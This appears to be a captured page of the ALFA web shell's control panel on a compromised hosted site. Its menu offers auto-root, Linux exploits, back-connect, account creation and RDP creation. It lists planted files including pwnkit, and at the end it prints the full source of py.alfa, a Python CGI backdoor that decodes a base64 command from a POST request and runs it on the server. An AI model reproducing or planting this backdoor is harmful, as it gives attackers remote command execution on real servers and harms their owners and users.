Linux webm002.cluster107.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.107.20.2 | : 216.73.216.173
Cant Read [ /etc/named.conf ]
5.4.45
raphaelr
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
raphaelr /
www /
ALFA_DATA /
alfacgiapi /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
0f.php
3.61
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
bash.alfa
1.52
KB
-rwxr-xr-x
perl.alfa
542
B
-rwxr-xr-x
pwnkit
0
B
-rwxr-xr-x
py.alfa
463
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : py.alfa
#!/usr/bin/python try: import cgitb; cgitb.enable() except: pass import os,cgi,base64 form = cgi.FieldStorage(environ={'REQUEST_METHOD':'POST'}) cmd = form.getvalue('cmd') check = form.getvalue('check') print "Content-type:text/html\r\n\r\n" if cmd: print base64.b64decode(check)+"<pre>" child_stdin, child_stdout = os.popen2(base64.b64decode(cmd)) child_stdin.close() result = child_stdout.read() child_stdout.close() print result.strip() print "</pre>"
Close